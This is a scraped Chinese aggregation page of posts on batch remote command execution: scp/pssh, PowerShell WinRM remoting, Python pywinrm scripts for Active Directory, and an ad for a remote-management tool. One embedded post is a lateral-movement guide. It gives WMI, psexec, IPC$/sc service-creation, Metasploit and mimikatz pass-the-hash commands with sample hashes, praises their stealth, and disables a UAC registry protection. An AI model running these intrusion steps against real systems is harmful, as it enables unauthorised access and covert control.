精华内容
下载资源
问答
  • Scp远程批量执行命令
    千次阅读
    2020-08-31 15:18:06

    一次拷贝多个文件或者目录

    # scp root@192.168.9.142:/usr/local/src/cp_dir/*.php /usr/local/src/  //拷贝多个文件
    # scp -r root@192.168.9.142:/usr/local/src/cp_dir/ /usr/local/src/   //拷贝目录
    

    从远程主机拷贝到本机

    # scp root@192.168.9.142:/usr/local/src/redis.tar.gz /usr/local/src/  //这里是从目标主机142拷贝文件到本机/usr/local/sr
    

    从本机拷贝到目标远程主机

    # scp php-7.2.4.tar.gz root@192.168.9.142:/usr/local/src/   //这里是从当前主机拷贝到IP位142的局域网主机目录/usr/local/src下
    

    Pssh

    pssh是python写的可以并发在多台机器上批量执行命令的工具,它的用法可以媲美ansible的一些简单用法,执行起来速度比ansible快它支持文件并行复制,远程命令执行,杀掉远程主机上的进程等等。杀手锏是文件并行复制

    更多相关内容
  • 做好ip清单,每行一个ip,ssh批量登录执行命令
  • 本篇文章主要是介绍了Python实现ssh批量登录并执行命令,有一些任务可以进行批量完成,Python就可以完成,有需要的同学可以了解一下。
  • mssh是一个批量远程ssh执行命令的工具。 它具有稳定、高效、准确,执行灵活方便,可以大幅度提高日常工作效率。 它的思想是:只用给它提供执行命令或者脚本和指定需要执行命令的机器列表,批量在指定机器上执行命令...
  • 注: 该脚本需要调用的模块为:paramiko, sys, ... 批量执行命令格式: -C "IP列表" -M '执行命令' 批量传送文件: -S "IP列表" -L "本地文件路径" -R "远程文件路径" 错误日志文件:$PWD/ssh_errors.log
  • Windows远程执行cmd命令的方法

    万次阅读 2019-09-10 22:16:48
    WMI执行命令(普通权限可以进行hash传递): 无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt" 利用wmiexec工具配合进行反弹半...

    觉得对自己有用 于是就记录下来了

    先说下IIS7远程链接无法连接怎么解决方法!

    先来讲下正常远程连接的的方法:

    想要进行远程桌面连接,可以同时按住键盘上的windows+R键,调出运行对话框,然后在打开里边输入远程桌面连接命令 mstsc ;

    输入远程桌面连接命令mstsc之后,按回车键或者“确定”打开远程桌面连接对话框,我们输入远程电脑或者服务IP地址,然后点击连接即可 !

    点击链接之后,我们输入远程电脑的登录用户名以及密码即可成功连接了。

    但是,可以成功连接对方的前提是我们远程桌面连接对方电脑需要设置允许进行远程协助以及允许其他电脑进行远程桌面连接,获取相应权限;而且我们还要知道对方电脑的服务IP地址,一般默认端口是3389,如果对方修改了默认端口,需要在进行远程桌面连接时以“ip地址:端口号”的形式连接;同时对方电脑的账户需要密码,有了相应的账号密码才能进行。

    使用微软自带的远程桌面连接也如此麻烦,还不如直接使用远程桌面连接软件

    主要这里易操作,并且在运维的时候很好管理,支持批量操作的哈!

    这里推荐个自己用的工具,下载地址: 服务器批量管理工具


    WMI执行命令(普通权限可以进行hash传递):

    无回显执行:wmic /node:192.168.1.158 /user:cbd666 /password:adexx!@#QWE process call create "cmd.exe /c ipconfig>c:\result.txt"

    利用wmiexec工具配合进行反弹半交互shell:cscript.exe //nologo wmiexec.vbs /shell 192.168.1.158 Administrator adexx!@#QWE

    上面两条命令走的都是135端口,这里的个好处是 攻击无日志,同时攻击脚本无需写入到磁盘,具有极高的隐蔽性!


    2.使用Hash直接登录Windows(HASH传递):

    抓取windows hash值,得到administrator的hash:

    598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

    win2008系统以后默认不存储LM hash,所以这里同样可以 32个0来代替LM hash,这里不一定需要32个0,只需要前32位是存在的即可

    00000000000000000000000000000000:2D20D252A479F485CDF5E171D93985BF

    然后利用msf中psexec模块进行HASH传递:

    msf调用payload:
    use exploit/windows/smb/psexec
    show options
    set RHOST 192.168.81.129
    set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
    set SMBUser Administrator
    show options
    run
    

    3. mimikatz传递hash方式连接+at计划任务执行命令:

    mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" 
    //传递hash
    dir \\192.168.1.185\c$
    

    4.psexec.exe远程执行命令

    psexec /accepteula //接受许可协议
    sc delete psexesvc
    psexec \\192.168.1.185 -u cbd666 -p adexx!@#QWE cmd.exe
    

    Server 2008以及2012中UAC影响着PSEXEC使用!


    5.winrm远程执行命令

    //肉机上面快速启动winrm服务,并绑定到5985端口:
    winrm quickconfig -q
    winrm set winrm/config/Client @{TrustedHosts="*"}
    netstat -ano|find "5985"
    
    //客户端连接方式:
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /all"
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE cmd
    
    //LocalAccountTokenFilterPolicy键,也就是UAC问题,普通管理员登录后也是高权限
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /groups"
    

    6.IPC命令配合sc命令

    net use \\192.168.17.138\c$ "adexx!@#QWE" /user:cbd666
    net use
    dir \\192.168.17.138\c$
    copy test.exe \\192.168.17.138\c$
    sc \\192.168.17.138 create test binpath= "c:\test.exe"
    sc \\192.168.17.138 start test
    sc \\192.168.17.138 del test
    

    这个IPC管道配合SC实际上就是等价于psexec,只不过这里psexec工具直接帮我们自动化完成了这两步!

    上面的话自己再讲一点,当我们进行了HASH 传递之后,实际上就是利用 NTLM 身份认证机制来进行验证的,那么只要我们通过了验证,在走445端口的时候会默认验证的NTLM身份,所以说只要HASH传递之后,以上的工具都是相通的,比如你net use \\192.168.17.138 /u:a\cbd666 adexx!@#QWE,直接cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21则直接可以获取到一个半交互式的shell!

    Pass The Hash的工具还有很多,但是大多本质是相同的。

    比如:

    Smbmap
    CrackMapExec
    Smbexec
    Metasploit(exploit/windows/smb/psexec_psh )
    wmiexec
    Invoke-WMIExec
    Invoke-SMBExec
    mimikatz(Overpass-the-hash)

    展开全文
  • Windows 远程管理 (WinRM) 是 WS-Management 协议的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。WS-Management 协议由硬件和...

        Windows 远程管理 (WinRM) 是 WS-Management 协议的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。WS-Management 协议由硬件和软件制造商群体开发,作为一种公共标准,可用于与实现该协议的任何计算机设备远程交换管理数据。

        使用PowerShell对服务器远程管理,要在远程服务器上启用WinRM。

    一、知识储备:

    1、WinRM相关操作

    开启WinRM服务:

    Enable-PSRemoting –Force

    阻止本地计算机接收远程命令(不会停止WinRM服务):

    Disable-psremoting –Force

    查看WinRM服务监听信息:

    winrm enumerate winrm/config/Listener

    WinRM2.0默认端口5985(HTTP端口)或5986(HTTPS端口)。

    删除WinRM HTTP侦听:

    winrm delete winrm/config/listener?Address=*+Transport=HTTP

    重新建立HTTP侦听:

    winrm create winrm/config/listener?Address=*+Transport=HTTP

    WinRM服务更改监听端口:

    set-item -force wsman:\localhost\listener\listener*\port 5985

    查看WinRM的配置:

    winrm get winrm/config

    查看端口监听状态:

    netstat -nao | findstr "5985"

    wKioL1kdBBzCxE20AAGJt42HbX0069.png-wh_50

    2、PowerShell脚本保存凭据方法

        使用Get-Credential命令来交互式输入凭据(用户名+密码),可以先将凭据保存到一个变量中,如:

    $cred = get-credential

    wKioL1kdBCjSkN7xAABGBTheQDA354.png-wh_50

        $cred的对象类型名称为:System.Management.Automation.PSCredential,其中的Password和UserName都是其属性,所以可以新建一个该类型的对象。在此处需要注意的是Password类型为SecureString,UserName类型为String,所以需要将明文的Password转换为安全字符串,可以使用ConvertTo-SecureString命令。

        非交互式保存凭据代码示例:

    1
    2
    3
    4
    $account  "administrator"  
    $password  '123456'  
    $secpwd  convertto-securestring  $password  -asplaintext -force  
    $cred  new-object  System.Management.Automation.PSCredential -argumentlist  $account , $secpwd

    3、Invoke-Command

        Invoke-Command在本地和远程计算机上运行命令,并从命令返回所有输出,包括错误。使用一个Invoke-Command命令,可以在多台计算机上运行命令。部分参数介绍:

    -Port <int>

    指定远程计算机上用于此命令的网络端口。用于WinRM默认监听端口被更改的情况下,指定新的端口。

    -ComputerName <string[]>

    指定运行此命令的计算机。默认值为本地计算机。

    使用 ComputerName 参数时,Windows PowerShell 会创建一个临时连接,此连接仅用于运行指定的命令,之后将关闭。如果需要持续性连接,请使用 Session 参数。

    在一个逗号分隔列表中键入一台或多台计算机的 NETBIOS 名称、IP 地址或完全限定的域名。要指定本地计算机,请键入计算机名称、“localhost”或句点 (.)。

    若要在 ComputerName 参数的值中使用 IP 地址,命令必须包括 Credential 参数。另外,必须为计算机配置 HTTPS 传输,或者必须在本地计算机上的 WinRM TrustedHosts 列表中包含远程计算机的 IP 地址。

    -Session <PSSession[]>

    在指定的 Windows PowerShell 会话 (PSSession) 中运行此命令。

    通过创建 PSSession,Windows PowerShell 可以建立与远程计算机的持续性连接。

    -Credential <PSCredential>

    指定有权执行此操作的用户帐户。默认值为当前用户。

    -command/-ScriptBlock <scriptblock>

    指定要运行的命令。用大括号 ({ }) 括起命令以形成脚本块。

    -FilePath <string>

    在一台或多台远程计算机上运行指定的本地脚本。

    -AsJob

    在远程计算机上将命令作为后台作业运行。使用此参数可运行需要较长时间才能完成的命令。

    使用 AsJob 时,此命令返回代表作业的对象,然后显示命令提示符。要管理作业,请使用 Job cmdlet。要获取作业结果,请使用 Receive-Job。

    -ThrottleLimit <int>

    指定为运行此命令可建立的并发连接的最大数目。如果省略此参数或输入 0 值,则使用默认值 32。

    4、PSSession

        PSSession即Windows PowerShell会话。当你需要与远程计算机的持续连接时,则使用PSSession。PSSession相关命令:

    Enter-PSSession

    启动与远程计算机间的交互式会话。

    New-PSSession

    创建PSSession,并返回一个表示PSSession的对象。你可以将对象保存在变量中。

    Get-PSSession

    获取当前会话中创建的PSSession。Get-PSSession返回与New-PSSession返回的对象相同类型的对象。

    Remove-PSSession

    删除 PSSession 并释放其正在使用的资源。

    5、将计算机名称添加到TrustedHosts列表

    若要将所有计算机添加到受信任主机列表,请使用以下命令 :

    set-item wsman:localhost\client\trustedhosts -Force -value *

    还可以使用通配符 (*) 将特定域中的所有计算机添加到受信任主机列表。

    例如,以下命令将Fabrikam域中的所有计算机添加到受信任主机列表。

    set-item wsman:localhost\client\trustedhosts *.fabrikam.com

    若要将特定计算机的 IP 地址添加到受信任主机列表,请使用以下命令格式(IP支持通配符*):

    set-item wsman:\localhost\Client\TrustedHosts -value "<IP Address>[,<IP Address>]"

    若要查看受信任主机列表,请使用以下命令:

    get-item wsman:\localhost\Client\TrustedHosts

    wKioL1kdBDbBLJikAABZOEO_R5Q583.png-wh_50


    二、远程操作常见场景

    场景一:远程交互式会话

      这个场景一般用于手动进行远程操作,输入命令,查看结果。方法很简单。进入交互式会话的命令是Enter-PSSession,退出时键入Exit-PSSession或者exit都可以。远程交互式操作期间,输入的命令在远程计算机上运行,就像直接在远程计算机上输入并执行这些命令一样。期间所定义的变量和命令的执行结果在退出交互式会话之后不再可用。

    1
    2
    3
    4
    5
    场景一例子:
    # 用户输入凭据(用户名+密码)
    $cred = get-Credential
    # 建立远程交互式会话
    Enter-PSSession  -computername 192.168.21.1 -Credential  $cred


    wKiom1kdBF-zRbLbAAApoTzX7cE469.png-wh_50


    场景二:脚本块、脚本文件的一次性执行

      这种场景,是在本地计算机与远程计算机上建立一个临时会话。将脚本块或者脚本文件的内容发送到远程计算机执行,并将结果发回本地计算机。这种方法执行效率很高,是PowerShell推荐的执行远程命令的方法。除非需要在会话中共享数据,否则建议使用该方法。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    场景二例子、
    # 用户输入凭据(用户名+密码)
    $cred = get-Credential
    # 远程执行命令
    invoke-command  -computername 192.168.21.1 -Credential  $cred  -command {dir C:/}
    invoke-command  -computername 192.168.21.1 -Credential  $cred  -ScriptBlock {dir c:\}
    # 远程执行脚本
    echo  "dir c:\"  > dirDriveC.ps1
    invoke-command  -computername 192.168.21.1 -Credential  $cred   -FilePath .\dirDriveC.ps1

    wKioL1kdBEOgG1zGAAAlVesM1jw732.png-wh_50

    1
    2
    3
    4
    5
    6
    7
    场景二例子(多个远程主机)、
    # 用户输入凭据(用户名+密码)
    $cred = get-Credential
    # 对多个远程主机批量执行命令
    invoke-command  -computername 192.168.21.1,192.168.21.4,192.168.21.7 -Credential  $cred  -ScriptBlock {dir c:\}
    # 设置并发连接数设置为1的情况
    invoke-command  -computername 192.168.21.1,192.168.21.4,192.168.21.7 -Credential  $cred  -ThrottleLimit 1 -ScriptBlock {dir c:\}


    场景三:脚本块、脚本文件在命名会话中执

    1、定义会话: 请使用new-pssession命令定义会话,如$session1 = new-pssession -computername server1。(如果必要请使用Credential参数。)

    2、在会话中远程执行脚本(或者脚本文件): 请使用Invoke-Command命令执行远程脚本,如Invoke-Command -Session $session1 -ScriptBlock {dir c:\}或者Invoke-Command -Session $session1 -FilePath .\dirDriveC.ps1

    3、获得结果: 可以将执行结果赋于变量,如$sub = Invoke-Command -Session $session1 -ScriptBlock {dir c:\}或者$sub = Invoke-Command -Session $session1 -FilePath .\dirDriveC.ps1

    后续命令可参照步骤2或者3继续执行,所有执行的命令就好像在同一个上下文中执行一样。

    1
    2
    3
    4
    5
    6
    7
    8
    场景三例子、
    # 用户输入凭据(用户名+密码)
    $cred = get-Credential
    # 创建PSSession,并赋值给变量
    $session1  new-pssession  -computername 192.168.21.1 -Credential  $cred
    # 远程执行命令(持续性)
    Invoke-Command  -Session  $session1  -ScriptBlock { $a = "hello world" }
    Invoke-Command  -Session  $session1  -ScriptBlock { $a }

    wKioL1kdBGzz--vqAAB_7WeKz-4673.png-wh_50

    1
    2
    3
    4
    5
    6
    7
    场景三例子(多个远程主机)、
    # 用户输入凭据(用户名+密码)
    $cred = get-Credential
    # 对多个远程主机创建PSSession,并赋值给变量
    $session_many  new-pssession  -computername 192.168.21.1,192.168.21.4,192.168.21.7 -Credential  $cred
    # 对多个远程主机批量执行命令
    Invoke-Command  -Session  $session_many  -ThrottleLimit 1 -ScriptBlock {dir c:\}
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    场景三例子(脚本方式)、
    $account  "administrator"
    $password  '123456'
    # 把密码转换为SecureString
    $secpwd  convertto-securestring  $password  -asplaintext -force
    # 新建PSCredential对象
    $cred  new-object  System.Management.Automation.PSCredential -argumentlist  $account , $secpwd
    # 远程主机列表赋值给变量
    [string[]] $computername = "192.168.21.1" , "192.168.21.4" , "192.168.21.7"
    # 创建PSSession
    $session_many  new-pssession  -computername  $computername  -Credential  $cred
    # 批量远程执行命令
    Invoke-Command  -Session  $session_many  -ThrottleLimit 1 -ScriptBlock {dir c:\}


    参考资料:

    https://technet.microsoft.com/zh-cn/library/dd347578.aspx

    https://technet.microsoft.com/zh-cn/library/hh847839.aspx

    https://technet.microsoft.com/zh-cn/library/dd347642.aspx

    http://www.cnblogs.com/ceachy/archive/2013/02/20/PowerShell_Remoting.html



    本文转自 张斌_青岛 51CTO博客,原文链接:http://blog.51cto.com/qicheng0211/1926913
    展开全文
  • 使用winrm远程连接windows server2019并批量执行powershell命令演示

    1.AD域服务器操作

    AD域服务器 快速配置开启winrm服务,如果没开启服务,则会报错:

    2020-05-05 15:51:27,945  ERROR  localAD.py  40  the specified credentials were rejected by the server
    

    这里是AD域服务器需要配置的命令:

    winrm quickconfig
    winrm e winrm/config/listener
    winrm set winrm/config/service/auth @{Basic="true"}
    winrm set winrm/config/service @{AllowUnencrypted="true"}
    winrm get winrm/config
    

    部分截图:
    在这里插入图片描述

    2.winrm使用演示

    2.1 安装pywinrm 0.4.1

    这里有一个坑,pip install的是pywinrm,但是python代码导包的时候写的应该是import winrm,特别注意一下,在这里纠结了好一会。

    2.2示例代码

    import logging
    import winrm
    
    # 日志设置
    LOG_FORMAT = "%(asctime)s  %(levelname)s  %(filename)s  %(lineno)d  %(message)s"
    logging.basicConfig(filename='localAD.log', level=logging.INFO, format=LOG_FORMAT)
    
    # 本地AD域
    LDAP_IP_LOCAL = '192.168.255.222'        # LDAP本地服务器IP
    LDAP_ADMIN_USER_LOCAL = 'CN=Administrator,CN=Users,DC=bilibili,DC=com'      # LDAP本地服务器管理员账户
    LDAP_ADMIN_PWD_LOCAL = 'QQqq#123'        # LDAP本地服务器管理员密码
    
    
    # powershell命令,用于打开/关闭OU是否被删除的权限
    cmd_list_enable_del = ["Import-Module ActiveDirectory",
                           "Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {"
                           "$_.ProtectedFromAccidentalDeletion -eq $true} | ft",
                           "Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {"
                           "$_.ProtectedFromAccidentalDeletion -eq $true} |Set-ADOrganizationalUnit "
                           "-ProtectedFromAccidentalDeletion $false"]
    cmd_list_disable_del = ["Import-Module ActiveDirectory",
                            "Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {"
                            "$_.ProtectedFromAccidentalDeletion -eq $false} | ft",
                            "Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {"
                            "$_.ProtectedFromAccidentalDeletion -eq $false} |Set-ADOrganizationalUnit "
                            "-ProtectedFromAccidentalDeletion $true"]
    
    
    def enable_del_ou_right(ip, user, pwd, cmd_l):
        try:
            win = winrm.Session('http://' + ip + ':5985/wsman', auth=(user, pwd))
            for cmd in cmd_l:
                ret = win.run_ps(cmd)
                if ret.status_code == 0:  # 调用成功
                    logging.info('执行命令【' + cmd + '】成功')
                else:
                    return False
            return True
        except Exception as e:
            logging.error(e)
    
    
    if __name__ == '__main__':
        # 调用ps脚本,开启OU删除权限
        # modify_right_res = enable_del_ou_right(LDAP_IP_LOCAL, 'administrator', LDAP_ADMIN_PWD_LOCAL, cmd_list_enable_del)
    
        # 关闭OU删除权限
        enable_del_ou_right(LDAP_IP_LOCAL, 'administrator', LDAP_ADMIN_PWD_LOCAL, cmd_list_disable_del)
    
    

    说明:关闭了OU的删除权限后,AD域中OU右键,对象中,可以看到所有OU都设置好了防止对象被意外删除:
    在这里插入图片描述
    下面是日志中记载的:

    2020-05-05 15:54:41,783  INFO  localAD.py  35  执行命令【Import-Module ActiveDirectory】成功
    2020-05-05 15:54:44,319  INFO  localAD.py  35  执行命令【Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {$_.ProtectedFromAccidentalDeletion -eq $false} | ft】成功
    2020-05-05 15:54:45,461  INFO  localAD.py  35  执行命令【Get-ADOrganizationalUnit -filter * -Properties ProtectedFromAccidentalDeletion | where {$_.ProtectedFromAccidentalDeletion -eq $false} |Set-ADOrganizationalUnit -ProtectedFromAccidentalDeletion $true】成功
    

    以上测试代码是远程连接修改AD域的,可以通过下面更简单的代码,看下出了什么问题

    import winrm
    
    # 虚机服务器server 2019
    IP_LOCAL = '192.168.255.223'        # 服务器IP
    PWD_LOCAL = 'QQqq#123'              # 服务器管理员密码
    
    # 测试的命令
    CMD = [
        'mkdir win_test_file'
    ]
    
    
    def run_cmd(ip, user, pwd, cmd_list):
        try:
            win = winrm.Session('http://' + ip + ':5985/wsman', auth=(user, pwd))
            for cmd in cmd_list:
                ret = win.run_ps(cmd)
                if ret.status_code == 0:  # 调用成功
                    print(cmd)
                else:
                    return False
            return True
        except Exception as e:
            print(e)
    
    
    if __name__ == '__main__':
        # 测试命令执行
        run_cmd(IP_LOCAL, 'administrator', PWD_LOCAL, CMD)
    
    

    如果报
    the specified credentials were rejected by the server
    账户密码有问题,其他问题 在核查中

    我有两台server2019虚拟机192.168.255.222那台可能是账号密码填写错误,
    192.168.255.223这台测试是ok的,可以在用户文件夹中生成一个文件夹
    在这里插入图片描述
    执行截图
    在这里插入图片描述

    展开全文
  • Ansible 批量远程管理 Windows主机

    千次阅读 2022-04-26 13:34:59
    测试环境介绍 Ansible 管理主机 [ CentOS 7.6 ] [ 10.0.200.70 ] Linux 管理服务器 需安装 pywinrm 插件 下载插件 ...pywinrm-0.4.2 ...Windows 机器 需安装 或 升级 PowerShell 4.0 以上版本 注:升级 P
  • 文章目录1 本地执行Linux指令2 远程执行Linux指令3 本地执行scp命令(不需要输入密码)4 测试代码 1 本地执行Linux指令 import subprocess def localSsh(command): print(f"开始在本地服务器上执行指令:{command}")...
  • 资源名称:史上最简单Linux、Windows批量管理工具BatchShell(全功能版)   内容简介: BatchShell是一款基于SSH2的批量文件传输及命令执行系统,它可以同时传输文件到多台远程服务器以及同时对多台远程...
  • Linux下远程连接windows执行命令 - Feng______的专栏 - 博客频道 - CSDN.NEThttp://blog.csdn.net/feng______/article/details/31535693 Python实现linux/windows通用批量命令/上传/下载’小工具 - 奋进的K - ...
  • 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe...
  • 下载plink.exe工具 写一个bat脚本,如下: D:\plink.exe -pw 12345678 root@192.168.0.1 "shutdown -h now; getkey
  • 主要介绍了win下调用putty执行命令脚本,可以利用这个实现一些自动化的工作,需要的朋友可以参考下
  • 使用PsExec.exe 文件进行远程批处理文件执行。使用xcopy进行远程文件拷贝1:RemoteDeployment_main.bat 修改该文件。 制定目标文件路径。2:RemoteDeployment_run.bat 设置该文件, 填写需要部署的远程文件的 ip 及...
  • ,老板要我写个东西,能对一批windows机器完成一些加组加权限的操作,虽然是非常的简单,但是因为我走了很多弯路,一开始想用powershell来写,后来又改成VBS的,最后还是用了最简单的CMD的命令的来完成,代码如下: ...
  • ssh远程执行多个命令

    万次阅读 2018-11-16 17:07:52
    一下介绍两种shell命令远程执行的方法。 前提条件:  配置ssh免密码登陆 对于简单的命令:  如果是简单执行几个命令,则: ssh user@remoteNode "cd /home ; ls"  基本能完成常用的对于远程节.....
  • PsTools 套件包括一些命令行程序,可列出本地或远程计算机上运行的进程、远程运行进程、重新启动计算机、转储事件日志,以及执行其他任务。 RegDelNull 扫描并删除包含嵌入空字符的注册表项,标准注册表编辑工具不能...
  • windows 10常用运行命令

    2019-11-06 11:02:10
    WIN+R调出命令框: ...5.chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符) 6.cleanmgr: 打开磁盘清理工具 7.cliconfg:SQL SERVER 客户端网络实用工具 8.cmstp:连接管理器配置文件安装程序 9...
  • Windows远程执行cmd命令的9种方法使用 ansible 批量管理 windows主机使用powershell和winrm实现Windows主机间批量操作WMIC Microsoft Windows Management Instrumentation利用wmic对Windows主机批量执行脚本WMIC介绍...
  • X友 NC 远程命令执行

    2021-06-09 20:11:10
    用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)二、漏洞...
  • 下载地址: ... 使用案列: ... #对单台主机远程执行pwd命令 -r cmd -u root -h 192.168.0.200 -P 22 -p abc-123 -c "pwd" #对0.200,0.201,0.202远程主机发起执行pwd命令 -r cmd -u root -h 192.16
  • 转载自:https://blog.51cto.com/7424593/2174156一、测试环境介绍Ansible管理主机:系统: CentOS6.8IP Addr: 172.16.10.22Linux管理服务器需安装pip、pywinrm插件Windows客户端主机:系统: Server2008R2 SP1 IP ...
  • 1、安装paramiko模块pip install paramiko可以修改ssh连接超时时间,windows下路径:在安装路径Python\Python36\Lib\site-packages\paramiko\transport.py,修改self.banner_timeout = 60(设置ssh超时为60秒)2、利用...
  • 大部分情况下,一个cmdshell 已经可以满足我们继续渗透的需求,所以不到万不得已的时候最好不要远程桌面连接(mstsc),而是通过远程执行命令的方式继续开展工作。本文整理了一些远程执行命令的姿势,测试环境如下: ...
  • HMLinux关注0人评论22039人阅读2018-09-12 12:04:42 一、测试环境介绍 Ansible管理主机: 系统: CentOS6.8 IP Addr: 172.16.10.22 ...Windows客户端主机: 系统: Server2008R2 SP1 IP Ad...
  • 第一种方式:首先建立一个bat文件,然后用记事本打开bat文件并编辑如下:rem MySQL_HOME 本地MySQL的安装路径rem host mysql 服务器的ip地址,可以是本地,也可以是远程rem port mysql 服务器的端口,缺省为3306rem ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 19,002
精华内容 7,600
关键字:

windows批量远程执行命令

友情链接: MP3_PLAYER.rar